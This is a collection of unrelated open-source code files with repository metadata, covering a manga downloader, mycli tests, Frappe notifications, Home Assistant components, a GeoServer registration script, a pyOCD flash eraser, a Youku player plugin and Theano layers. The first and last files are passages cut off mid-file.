print('Choose a number:', end='\n\n')
print('1. MangaStream')
print('2. MangaPanda')
print('3. MangaHere', end='\n\n')
#print('4. Batoto', end='\n\n')
elif site_input == 'n':
print('Goodbye.')
break
else:
print('Invalid input.')
os.chdir(MAIN_currentDirectory)
print('Do you want to download from another manga site? [y/n]')
site_input = input()
print()
site_input = site_input.lower()
#End of While Loop
#End of main
Main()
time.sleep(15)
| gpl-2.0 | 108,732,882,995,455,120 | 41.398062 | 189 | 0.431045 | false |
nkhuyu/mycli | tests/test_naive_completion.py | 14 | 1657 | from __future__ import unicode_literals
import pytest
from prompt_toolkit.completion import Completion
from prompt_toolkit.document import Document
@pytest.fixture
def completer():
import mycli.sqlcompleter as sqlcompleter
return sqlcompleter.SQLCompleter(smart_completion=False)
@pytest.fixture
def complete_event():
from mock import Mock
return Mock()
def test_empty_string_completion(completer, complete_event):
text = ''
position = 0
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set(map(Completion, completer.all_completions))
def test_select_keyword_completion(completer, complete_event):
text = 'SEL'
position = len('SEL')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([Completion(text='SELECT', start_position=-3)])
def test_function_name_completion(completer, complete_event):
text = 'SELECT MA'
position = len('SELECT MA')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set([
Completion(text='MAX', start_position=-2),
Completion(text='MAXEXTENTS', start_position=-2)])
def test_column_name_completion(completer, complete_event):
text = 'SELECT FROM users'
position = len('SELECT ')
result = set(completer.get_completions(
Document(text=text, cursor_position=position),
complete_event))
assert result == set(map(Completion, completer.all_completions))
| bsd-3-clause | 3,624,417,064,897,019,000 | 33.520833 | 72 | 0.702474 | false |
saurabh6790/frappe | frappe/desk/doctype/notification_log/notification_log.py | 1 | 4285 | # -*- coding: utf-8 -*-
# Copyright (c) 2019, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.model.document import Document
from frappe.desk.doctype.notification_settings.notification_settings import (is_notifications_enabled, is_email_notifications_enabled_for_type, set_seen_value)
class NotificationLog(Document):
def after_insert(self):
frappe.publish_realtime('notification', after_commit=True, user=self.for_user)
set_notifications_as_unseen(self.for_user)
if is_email_notifications_enabled_for_type(self.for_user, self.type):
send_notification_email(self)
def get_permission_query_conditions(for_user):
if not for_user:
for_user = frappe.session.user
if for_user == 'Administrator':
return
return '''(`tabNotification Log`.for_user = '{user}')'''.format(user=for_user)
def get_title(doctype, docname, title_field=None):
if not title_field:
title_field = frappe.get_meta(doctype).get_title_field()
title = docname if title_field == "name" else \
frappe.db.get_value(doctype, docname, title_field)
return title
def get_title_html(title):
return '<b class="subject-title">{0}</b>'.format(title)
def enqueue_create_notification(users, doc):
'''
During installation of new site, enqueue_create_notification tries to connect to Redis.
This breaks new site creation if Redis server is not running.
We do not need any notifications in fresh installation
'''
if frappe.flags.in_install:
return
doc = frappe._dict(doc)
if isinstance(users, str):
users = [user.strip() for user in users.split(',') if user.strip()]
users = list(set(users))
frappe.enqueue(
'frappe.desk.doctype.notification_log.notification_log.make_notification_logs',
doc=doc,
users=users,
now=frappe.flags.in_test
)
def make_notification_logs(doc, users):
from frappe.social.doctype.energy_point_settings.energy_point_settings import is_energy_point_enabled
for user in users:
if frappe.db.exists('User', {"email": user, "enabled": 1}):
if is_notifications_enabled(user):
if doc.type == 'Energy Point' and not is_energy_point_enabled():
return
_doc = frappe.new_doc('Notification Log')
_doc.update(doc)
_doc.for_user = user
if _doc.for_user != _doc.from_user or doc.type == 'Energy Point' or doc.type == 'Alert':
_doc.insert(ignore_permissions=True)
def send_notification_email(doc):
if doc.type == 'Energy Point' and doc.email_content is None:
return
from frappe.utils import get_url_to_form, strip_html
doc_link = get_url_to_form(doc.document_type, doc.document_name)
header = get_email_header(doc)
email_subject = strip_html(doc.subject)
frappe.sendmail(
recipients = doc.for_user,
subject = email_subject,
template = "new_notification",
args = {
'body_content': doc.subject,
'description': doc.email_content,
'document_type': doc.document_type,
'document_name': doc.document_name,
'doc_link': doc_link
},
header = [header, 'orange'],
now=frappe.flags.in_test
)
def get_email_header(doc):
docname = doc.document_name
header_map = {
'Default': _('New Notification'),
'Mention': _('New Mention on {0}').format(docname),
'Assignment': _('Assignment Update on {0}').format(docname),
'Share': _('New Document Shared {0}').format(docname),
'Energy Point': _('Energy Point Update on {0}').format(docname),
}
return header_map[doc.type or 'Default']
@frappe.whitelist()
def mark_all_as_read():
unread_docs_list = frappe.db.get_all('Notification Log', filters = {'read': 0, 'for_user': frappe.session.user})
unread_docnames = [doc.name for doc in unread_docs_list]
if unread_docnames:
filters = {'name': ['in', unread_docnames]}
frappe.db.set_value('Notification Log', filters, 'read', 1, update_modified=False)
@frappe.whitelist()
def mark_as_read(docname):
if docname:
frappe.db.set_value('Notification Log', docname, 'read', 1, update_modified=False)
@frappe.whitelist()
def trigger_indicator_hide():
frappe.publish_realtime('indicator_hide', user=frappe.session.user)
def set_notifications_as_unseen(user):
try:
frappe.db.set_value('Notification Settings', user, 'seen', 0)
except frappe.DoesNotExistError:
return
| mit | 6,160,874,969,101,730,000 | 30.740741 | 159 | 0.715519 | false |
PetePriority/home-assistant | homeassistant/components/google_assistant/const.py | 2 | 1493 | """Constants for Google Assistant."""
DOMAIN = 'google_assistant'
GOOGLE_ASSISTANT_API_ENDPOINT = '/api/google_assistant'
CONF_EXPOSE = 'expose'
CONF_ENTITY_CONFIG = 'entity_config'
CONF_EXPOSE_BY_DEFAULT = 'expose_by_default'
CONF_EXPOSED_DOMAINS = 'exposed_domains'
CONF_PROJECT_ID = 'project_id'
CONF_ALIASES = 'aliases'
CONF_API_KEY = 'api_key'
CONF_ROOM_HINT = 'room'
CONF_ALLOW_UNLOCK = 'allow_unlock'
DEFAULT_EXPOSE_BY_DEFAULT = True
DEFAULT_EXPOSED_DOMAINS = [
'climate', 'cover', 'fan', 'group', 'input_boolean', 'light',
'media_player', 'scene', 'script', 'switch', 'vacuum', 'lock',
]
DEFAULT_ALLOW_UNLOCK = False
PREFIX_TYPES = 'action.devices.types.'
TYPE_LIGHT = PREFIX_TYPES + 'LIGHT'
TYPE_SWITCH = PREFIX_TYPES + 'SWITCH'
TYPE_VACUUM = PREFIX_TYPES + 'VACUUM'
TYPE_SCENE = PREFIX_TYPES + 'SCENE'
TYPE_FAN = PREFIX_TYPES + 'FAN'
TYPE_THERMOSTAT = PREFIX_TYPES + 'THERMOSTAT'
TYPE_LOCK = PREFIX_TYPES + 'LOCK'
SERVICE_REQUEST_SYNC = 'request_sync'
HOMEGRAPH_URL = 'https://homegraph.googleapis.com/'
REQUEST_SYNC_BASE_URL = HOMEGRAPH_URL + 'v1/devices:requestSync'
# Error codes used for SmartHomeError class
# https://developers.google.com/actions/smarthome/create-app#error_responses
ERR_DEVICE_OFFLINE = "deviceOffline"
ERR_DEVICE_NOT_FOUND = "deviceNotFound"
ERR_VALUE_OUT_OF_RANGE = "valueOutOfRange"
ERR_NOT_SUPPORTED = "notSupported"
ERR_PROTOCOL_ERROR = 'protocolError'
ERR_UNKNOWN_ERROR = 'unknownError'
ERR_FUNCTION_NOT_SUPPORTED = 'functionNotSupported'
| apache-2.0 | -7,944,093,607,279,498,000 | 32.931818 | 76 | 0.732083 | false |
GeoGateway/GeoServer | scripts/batch_register_sample.py | 1 | 2792 |
"""batch register tiff with sytle
"""
import json
import os
import subprocess
import urllib.request
def main():
"""generate copy list"""
# geojson output from UAVSAR search API
jsonfile = "uavsar_ca.geojson"
with open(jsonfile, "r") as f:
data = json.loads(f.read())
datafolder1 = "/mnt/SGG/password_production/geotiff/"
datafolder2 = "/mnt/SGG/NAS/password/insar/geotiff/"
datafolder3 = "/home/geogateway/geotiff/"
for item in data:
uid = item['uid']
tiff = ""
if int(uid) >= 1000:
datadir = datafolder1
else:
if int(uid) <= 117:
datadir = datafolder3
else:
datadir = datafolder2
tiff += "uid_" + uid + "/" + "uid" + uid + "_unw.tiff"
if int(uid) <= 117:
tiff = "uid" + uid + "_unw.tiff"
layername = "uid" + uid + "_unw"
print("register", tiff)
geoserver = "http://127.0.0.1:8080/geoserver/InSAR/wms?version=1.1.1&request=DescribeLayer&outputFormat=application/json&exceptions=application/json"
queryurl = geoserver + "&layers="+"InSAR:"+layername
with urllib.request.urlopen(queryurl) as x:
rawtext = x.read().decode('utf8')
x.close
# response = urllib2.urlopen(queryurl)
# json_output = response.read()
json_output = rawtext
if "exceptions" in json_output:
# not registered
tiff = datadir + tiff
coverage = layername
print(tiff, coverage)
cmd = "curl -u admin:password -v -XPOST -H 'Content-type: application/xml' -d '<coverageStore> <name>" + coverage + "</name><workspace>InSAR</workspace><enabled>true</enabled><type>GeoTIFF</type></coverageStore>' \"http://127.0.0.1:8080/geoserver/rest/workspaces/InSAR/coveragestores\""
#print(cmd)
subprocess.call(cmd, shell=True)
cmd = "curl -u admin:password -v -XPUT -H 'Content-type: text/plain' -d 'file:" + tiff + "' \"http://127.0.0.1:8080/geoserver/rest/workspaces/InSAR/coveragestores/" + coverage + "/external.geotiff?configure=first\&coverageName=" + coverage + "\""
#print(cmd)
subprocess.call(cmd, shell=True)
# change defualt style
defaultstyle = layername + "_default"
cmd = 'curl -v -u admin:password -XPUT -H "Content-type: text/xml" -d "<layer><defaultStyle><name>InSAR:%s</name></defaultStyle></layer>" http://127.0.0.1:8080/geoserver/rest/layers/InSAR:%s'
cmd = cmd % (defaultstyle, coverage)
#print(cmd)
subprocess.call(cmd, shell=True)
else:
print("already registered: ", uid)
continue
if __name__ == '__main__':
main()
| apache-2.0 | -7,177,346,655,251,294,000 | 36.226667 | 298 | 0.579871 | false |
mbedmicro/pyOCD | pyocd/flash/eraser.py | 1 | 7129 | # pyOCD debugger
# Copyright (c) 2018-2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from enum import Enum
import six
from ..core.memory_map import MemoryType
from ..core import exceptions
from ..utility.progress import print_progress
LOG = logging.getLogger(__name__)
class FlashEraser(object):
"""! @brief Class that manages high level flash erasing.
Can erase a target in one of three modes:
- chip erase: Erase all flash on the target.
- mass erase: Also erase all flash on the target. However, on some targets, a mass erase has
special properties such as unlocking security or erasing additional configuration regions
that are not erased by a chip erase. If a target does not have a special mass erase, then
it simply reverts to a chip erase.
- sector erase: One or more sectors are erased.
"""
class Mode(Enum):
MASS = 1
CHIP = 2
SECTOR = 3
def __init__(self, session, mode):
"""! @brief Constructor.
@param self
@param session The session instance.
@param mode One of the FlashEraser.Mode enums to select mass, chip, or sector erase.
"""
self._session = session
self._mode = mode
def erase(self, addresses=None):
"""! @brief Perform the type of erase operation selected when the object was created.
For sector erase mode, an iterable of sector addresses specifications must be provided via
the _addresses_ parameter. The address iterable elements can be either strings, tuples,
or integers. Tuples must have two elements, the start and end addresses of a range to erase.
Integers are simply an address within the single page to erase.
String address specifications may be in one of three formats: "<address>", "<start>-<end>",
or "<start>+<length>". Each field denoted by angled brackets is an integer literal in
either decimal or hex notation.
Examples:
- "0x1000" - erase the one sector at 0x1000
- "0x1000-0x4fff" - erase sectors from 0x1000 up to but not including 0x5000
- "0x8000+0x800" - erase sectors starting at 0x8000 through 0x87ff
@param self
@param addresses List of addresses or address ranges of the sectors to erase.
"""
if self._mode == self.Mode.MASS:
self._mass_erase()
elif self._mode == self.Mode.CHIP:
self._chip_erase()
elif self._mode == self.Mode.SECTOR and addresses:
self._sector_erase(addresses)
else:
LOG.warning("No operation performed")
def _mass_erase(self):
LOG.info("Mass erasing device...")
if self._session.target.mass_erase():
LOG.info("Successfully erased.")
else:
LOG.error("Mass erase failed.")
def _chip_erase(self):
LOG.info("Erasing chip...")
# Erase all flash regions. This may be overkill if either each region's algo erases
# all regions on the chip. But there's no current way to know whether this will happen,
# so prefer to be certain.
for region in self._session.target.memory_map.iter_matching_regions(type=MemoryType.FLASH):
if region.flash is not None:
if region.flash.is_erase_all_supported:
region.flash.init(region.flash.Operation.ERASE)
region.flash.erase_all()
region.flash.cleanup()
else:
self._sector_erase([(region.start, region.end)])
LOG.info("Done")
def _sector_erase(self, addresses):
flash = None
currentRegion = None
for spec in addresses:
# Convert the spec into a start and end address.
sector_addr, end_addr = self._convert_spec(spec)
while sector_addr < end_addr:
# Look up the flash memory region for the current address.
region = self._session.target.memory_map.get_region_for_address(sector_addr)
if region is None:
LOG.warning("address 0x%08x is not within a memory region", sector_addr)
break
if not region.is_flash:
LOG.warning("address 0x%08x is not in flash", sector_addr)
break
# Handle switching regions.
if region is not currentRegion:
# Clean up previous flash.
if flash is not None:
flash.cleanup()
currentRegion = region
flash = region.flash
flash.init(flash.Operation.ERASE)
assert flash is not None
# Get sector info for the current address.
sector_info = flash.get_sector_info(sector_addr)
assert sector_info, ("sector address 0x%08x within flash region '%s' is invalid"
% (sector_addr, region.name))
# Align first page address.
delta = sector_addr % sector_info.size
if delta:
LOG.warning("sector address 0x%08x is unaligned", sector_addr)
sector_addr -= delta
# Erase this page.
LOG.info("Erasing sector 0x%08x (%d bytes)", sector_addr, sector_info.size)
flash.erase_sector(sector_addr)
sector_addr += sector_info.size
if flash is not None:
flash.cleanup()
def _convert_spec(self, spec):
if isinstance(spec, six.string_types):
# Convert spec from string to range.
if '-' in spec:
a, b = spec.split('-')
page_addr = int(a, base=0)
end_addr = int(b, base=0)
elif '+' in spec:
a, b = spec.split('+')
page_addr = int(a, base=0)
length = int(b, base=0)
end_addr = page_addr + length
else:
page_addr = int(spec, base=0)
end_addr = page_addr + 1
elif isinstance(spec, tuple):
page_addr = spec[0]
end_addr = spec[1]
else:
page_addr = spec
end_addr = page_addr + 1
return page_addr, end_addr
| apache-2.0 | -8,523,969,503,809,062,000 | 39.276836 | 100 | 0.573573 | false |
linuxdeepin/deepin-media-player | src/plugins/plugin_youku.py | 1 | 9055 | #! /usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2013 XXX, Inc.
# 2013 红铭曼,王芳
#
# Author: 红铭曼,王芳 <[email protected]>
# Maintainer: 红铭曼,王芳 <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from youku.youku_scan import scan_page
from youku.youku_to_flvcd import YouToFlvcd
from youku.youku_web_parse import YoukuWebParse
from youku.youku_web import music_type_dict, comic_type_dict, youku_root
from youku.youku_web import zy_type_dict, movie_type_dict, tv_type_dict
from widget.utils import ScanTreeview
import gtk
title = "优酷插件"
class_name = "PluginYouku"
version = "1.0"
auto_check = False
author = "hongmingman [email protected]"
about = '''优酷视频的插件,由社区爱好者开发。我们不对使用该插件造成的任何结果负责。如有问题,请联系插件原作者。'''
class PluginYouku(object):
def __init__(self, this):
self.this = this
self.this.add_net_to_play_list
self.__init_values()
#self.__init_gui()
def __init_values(self):
#
self.youku_web_parse = YoukuWebParse()
#
self.show_check = auto_check
self.tree_view = self.this.gui.play_list_view.tree_view
self.tree_view.connect_event("treeview-press-event", self.__treeview_press_event)
self.tree_view.connect_event("treeview-double-event", self.__treeview_double_event)
self.note_book = self.this.gui.play_list_view.note_book
# 初始化网络播放列表.
self.__init_tree_view()
def __init_tree_view(self):
self.youku_root = self.tree_view.nodes.add("优酷视频")
self.youku_root.addr = "http://www.youku.com"
# 初始化根节点的 表单.
for key, addr in youku_root.items():
node = self.youku_root.nodes.add(key)
node.addr = addr
self.tv_node = self.youku_root.nodes[0]
self.movie_node = self.youku_root.nodes[1]
self.zy_node = self.youku_root.nodes[2]
self.music_node = self.youku_root.nodes[3]
self.comic_node = self.youku_root.nodes[4]
#
self.__init_type_lists()
def __init_type_lists(self):
for key in tv_type_dict.keys():
node = self.tv_node.nodes.add(key)
node.addr = tv_type_dict[key]
for key in movie_type_dict.keys():
node = self.movie_node.nodes.add(key)
node.addr = movie_type_dict[key]
for key in zy_type_dict.keys():
node = self.zy_node.nodes.add(key)
node.addr = zy_type_dict[key]
for key in music_type_dict.keys():
node = self.music_node.nodes.add(key)
node.addr = music_type_dict[key]
for key in comic_type_dict.keys():
node = self.comic_node.nodes.add(key)
node.addr = comic_type_dict[key]
'''
#info_list, page_num, all_sum = self.youku_web_parse.parse_web(v_olist_dict["热血"])
for info in info_list:
node = re_xue_node.nodes.add(info[0])
node.addr = info[1]
'''
def __treeview_press_event(self, treeview, node):
if node.leave == 2 and node.nodes == []:
scan_treeview = ScanTreeview(self.youku_web_parse, node.addr, True)
scan_treeview.connect("scan-end-event", self.scan_treeview_end_event, node)
scan_treeview.run()
elif (node.leave == 3 and
node.nodes == [] and
node.parent.this.parent.this.text not in ["音乐", "电影"]):
scan_treeview = ScanTreeview(self.youku_web_parse, node.addr, False)
scan_treeview.connect("scan-end-event", self.scan_treeview_end_event, node)
scan_treeview.run()
def __treeview_double_event(self, tree_view, node):
if node.leave == 4:
self.add_to_play_list(node)
elif node.leave == 3:
# 判断是否为音乐,电影,因为电影,音乐不在这个范围内(层级).
if node.parent.this.parent.this.text in ["音乐"]:
self.add_to_play_list(node)
elif node.parent.this.parent.this.text in ["电影"]:
movie_info = self.youku_web_parse.scan_movie_leave(node.addr)
if movie_info:
save_addr = node.addr
node.addr = movie_info[0]
self.add_to_play_list(node)
node.addr = save_addr
else:
self.this.show_messagebox("优酷收费视频,无法播放...")
def scan_treeview_end_event(self, scan_tv, temp_list, node):
for addr, name in temp_list:
temp_node = node.nodes.add(name)
temp_node.addr = addr
if temp_list:
node.is_expanded = True
def add_to_play_list(self, node):
flvcd = YouToFlvcd()
scan_treeview = ScanTreeview(flvcd, node.addr, 2)
scan_treeview.connect("scan-end-event", self.scan_end_add_to_list_event, node)
scan_treeview.run()
#flvcd_addr_list = flvcd.parse(node.addr)
def scan_end_add_to_list_event(self, scan_tv, temp_list, node):
flvcd_addr_list = temp_list
index = 0
for addr in flvcd_addr_list:
check = False
if not index:
check = True
if len(flvcd_addr_list) > 1:
text = node.text + "-" + str(index)
else:
text = node.text
self.this.add_net_to_play_list(
text,
addr,
"优酷视频", check)
index += 1
def __init_gui(self):
self.scan_win = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.scrol_win = gtk.ScrolledWindow()
self.scan_entry_hbox = gtk.HBox()
self.scan_entry = gtk.Entry()
self.scan_btn = gtk.Button("搜索")
self.scan_btn.connect("clicked", self.scan_btn_clicked)
self.scan_entry_hbox.pack_start(self.scan_entry, False, False)
self.scan_entry_hbox.pack_start(self.scan_btn, False, False)
#
self.vbox = gtk.VBox()
self.vbox.pack_start(self.scan_entry_hbox, False, False)
self.scrol_win.add_with_viewport(self.vbox)
self.scan_win.add(self.scrol_win)
#
w, h = 300, 300
self.scan_win.set_size_request(w, h)
def scan_btn_clicked(self, widget):
scan_text = self.scan_entry.get_text()
scan_info = scan_page(1, scan_text)
info_list = scan_info[0] # 信息列表.
for info_list in scan_info[0]:
btn = gtk.Button(info_list[0] + info_list[1] + "时间" + info_list[2] + info_list[3])
btn.connect("clicked", self.btn_connect_addr_to, info_list)
self.vbox.pack_start(btn, False, False)
self.vbox.show_all()
#######################################
#page_num = scan_info[1] # 一页的总页数.
#sum = scan_info[2] # 全部搜索的数.
#page_sum = min(sum/page_num, 100)
#print "总的页数:", page_sum
def btn_connect_addr_to(self, widget, info):
flvcd = YouToFlvcd()
flvcd_addr_list = flvcd.parse(info[1])
index = 0
for addr in flvcd_addr_list:
check = False
if not index:
check = True
self.this.add_net_to_play_list(info[0]+ str(index),
addr,
info[3], check)
index += 1
def show_scan_win(self):
if self.show_check:
self.scan_win.show_all()
def hide_scan_win(self):
self.scan_win.hide_all()
def start_plugin(self):
#print "start_plugin."
self.show_check = True
#self.show_scan_win()
self.note_book.show_title() # 修复BUG, 当为网络列表的时候 隐藏,就看不到本地列表拉.
self.note_book.layout_show_check = False
self.note_book.set_child_size()
# 展开节点.
self.youku_root.is_expanded = True
def stop_plugin(self):
#print "end_plugin..."
self.show_check = False
# 删除网络列表的node.
# 并影藏网络列表.
self.note_book.hide_title()
self.tree_view.clear()
self.note_book.layout_show_check = True
self.note_book.set_child_size()
| gpl-3.0 | -5,753,949,909,109,979,000 | 35.443038 | 94 | 0.571842 | false |
devdelay/home-assistant | tests/components/alarm_control_panel/test_mqtt.py | 8 | 7707 | """The tests the MQTT alarm control panel component."""
import unittest
from homeassistant.bootstrap import _setup_component
from homeassistant.const import (
STATE_ALARM_DISARMED, STATE_ALARM_ARMED_HOME, STATE_ALARM_ARMED_AWAY,
STATE_ALARM_PENDING, STATE_ALARM_TRIGGERED, STATE_UNKNOWN)
from homeassistant.components import alarm_control_panel
from tests.common import (
mock_mqtt_component, fire_mqtt_message, get_test_home_assistant)
CODE = 'HELLO_CODE'
class TestAlarmControlPanelMQTT(unittest.TestCase):
"""Test the manual alarm module."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
self.mock_publish = mock_mqtt_component(self.hass)
def tearDown(self): # pylint: disable=invalid-name
"""Stop down stuff we started."""
self.hass.stop()
def test_fail_setup_without_state_topic(self):
"""Test for failing with no state topic."""
self.hass.config.components = ['mqtt']
assert not _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'command_topic': 'alarm/command'
}
})
def test_fail_setup_without_command_topic(self):
"""Test failing with no command topic."""
self.hass.config.components = ['mqtt']
assert not _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'state_topic': 'alarm/state'
}
})
def test_update_state_via_state_topic(self):
"""Test updating with via state topic."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
entity_id = 'alarm_control_panel.test'
self.assertEqual(STATE_UNKNOWN,
self.hass.states.get(entity_id).state)
for state in (STATE_ALARM_DISARMED, STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_AWAY, STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED):
fire_mqtt_message(self.hass, 'alarm/state', state)
self.hass.pool.block_till_done()
self.assertEqual(state, self.hass.states.get(entity_id).state)
def test_ignore_update_state_if_unknown_via_state_topic(self):
"""Test ignoring updates via state topic."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
entity_id = 'alarm_control_panel.test'
self.assertEqual(STATE_UNKNOWN,
self.hass.states.get(entity_id).state)
fire_mqtt_message(self.hass, 'alarm/state', 'unsupported state')
self.hass.pool.block_till_done()
self.assertEqual(STATE_UNKNOWN, self.hass.states.get(entity_id).state)
def test_arm_home_publishes_mqtt(self):
"""Test publishing of MQTT messages while armed."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
alarm_control_panel.alarm_arm_home(self.hass)
self.hass.pool.block_till_done()
self.assertEqual(('alarm/command', 'ARM_HOME', 0, False),
self.mock_publish.mock_calls[-1][1])
def test_arm_home_not_publishes_mqtt_with_invalid_code(self):
"""Test not publishing of MQTT messages with invalid code."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
'code': '1234'
}
})
call_count = self.mock_publish.call_count
alarm_control_panel.alarm_arm_home(self.hass, 'abcd')
self.hass.pool.block_till_done()
self.assertEqual(call_count, self.mock_publish.call_count)
def test_arm_away_publishes_mqtt(self):
"""Test publishing of MQTT messages while armed."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
alarm_control_panel.alarm_arm_away(self.hass)
self.hass.pool.block_till_done()
self.assertEqual(('alarm/command', 'ARM_AWAY', 0, False),
self.mock_publish.mock_calls[-1][1])
def test_arm_away_not_publishes_mqtt_with_invalid_code(self):
"""Test not publishing of MQTT messages with invalid code."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
'code': '1234'
}
})
call_count = self.mock_publish.call_count
alarm_control_panel.alarm_arm_away(self.hass, 'abcd')
self.hass.pool.block_till_done()
self.assertEqual(call_count, self.mock_publish.call_count)
def test_disarm_publishes_mqtt(self):
"""Test publishing of MQTT messages while disarmed."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
}
})
alarm_control_panel.alarm_disarm(self.hass)
self.hass.pool.block_till_done()
self.assertEqual(('alarm/command', 'DISARM', 0, False),
self.mock_publish.mock_calls[-1][1])
def test_disarm_not_publishes_mqtt_with_invalid_code(self):
"""Test not publishing of MQTT messages with invalid code."""
self.hass.config.components = ['mqtt']
assert _setup_component(self.hass, alarm_control_panel.DOMAIN, {
alarm_control_panel.DOMAIN: {
'platform': 'mqtt',
'name': 'test',
'state_topic': 'alarm/state',
'command_topic': 'alarm/command',
'code': '1234'
}
})
call_count = self.mock_publish.call_count
alarm_control_panel.alarm_disarm(self.hass, 'abcd')
self.hass.pool.block_till_done()
self.assertEqual(call_count, self.mock_publish.call_count)
| mit | -7,653,025,829,172,212,000 | 38.321429 | 78 | 0.57052 | false |
saebrahimi/Emotion-Recognition-EmotiW2015 | common/layers.py | 2 | 13715 | import theano
from theano import tensor as T
from theano.tensor.nnet import conv
from theano.tensor.signal.downsample import max_pool_2d
import numpy as np
class Layer(object):
def __init__(self, inputs, inputs_shape=None):
"""
Useful to get outputs shape
"""
if isinstance(inputs, Layer):
self.inputs = inputs.outputs
self.inputs_shape = inputs.outputs_shape
else:
assert(inputs_shape is not None)
self.inputs = inputs
self.inputs_shape = inputs_shape
print '({0}) input shape {1}'.format(self.name, self.inputs_shape)
class RandFlip(Layer):
def __init__(self, inputs, image_shape, name, theano_rng, mode_var):
# one window for whole batch
self.name = name
super(RandFlip, self).__init__(inputs, image_shape)
self.theano_rng = theano_rng
self.mode = mode_var
self.params = []
self.flipped = self.inputs[:,:,:,::-1]
self.doflip = self.theano_rng.binomial(
n=1, p=.5, size=(self.inputs.shape[0],))
# if train mode: randomly flip, else don't flip
self.outputs = T.switch(
self.mode,
self.inputs,
T.switch(self.doflip.dimshuffle(0,'x','x','x'),
self.flipped, self.inputs))
#self.outputs = inputs
self.outputs_shape = self.inputs_shape
class ConvLayer(Layer):
def __init__(self, rng, inputs, filter_shape,
name, image_shape=None, pad=0, init_scale=None):
"""
Convolutional layer
Args
----
rng: instance of numpy.random.RandomState
inputs: symbolic theano variable
filter_shape: tuple of 4 ints (channels_out)
"""
self.name = name
super(ConvLayer, self).__init__(inputs, image_shape)
assert self.inputs_shape[1] == filter_shape[1]
self.rng = rng
self.filter_shape = filter_shape
self.pad = pad
if init_scale is None:
# if we don't specify a scale for weight initialization,
# we use the formula
# 1/sqrt(number of weights in each filter)
init_scale = 1. / np.sqrt(
filter_shape[1] *
filter_shape[2] *
filter_shape[3])
self.init_scale = init_scale
self.W = theano.shared(
np.asarray(
rng.uniform(low=-self.init_scale, high=self.init_scale,
size=self.filter_shape),
dtype=theano.config.floatX
), name='{0}_W'.format(self.name)
)
self.params = [self.W]
# if padding is greater than zero, we insert the inputs into
# the center of a larger zero array, effectively adding zero
# borders
if self.pad > 0:
self.padded_inputs = T.set_subtensor(
T.zeros((self.inputs_shape[0],
self.inputs_shape[1],
self.inputs_shape[2] + 2 * self.pad,
self.inputs_shape[3] + 2 * self.pad),
dtype=self.inputs.dtype)[:, :, pad:-pad, pad:-pad],
self.inputs
)
else:
self.padded_inputs = self.inputs
self.padded_inputs_shape = (
self.inputs_shape[0],
self.inputs_shape[1],
self.inputs_shape[2] + 2 * self.pad,
self.inputs_shape[3] + 2 * self.pad)
self.outputs = conv.conv2d(
input=self.padded_inputs,
filters=self.W,
filter_shape=self.filter_shape,
image_shape=self.padded_inputs_shape
)
self.outputs_shape = (
self.inputs_shape[0], self.filter_shape[0],
self.inputs_shape[2] + 2 * self.pad - self.filter_shape[2] + 1,
self.inputs_shape[3] + 2 * self.pad - self.filter_shape[3] + 1)
class MaxPoolLayer(Layer):
def __init__(self, inputs, pool_size, name, ignore_border=True, stride=None):
"""
Max pooling layer
"""
self.name = name
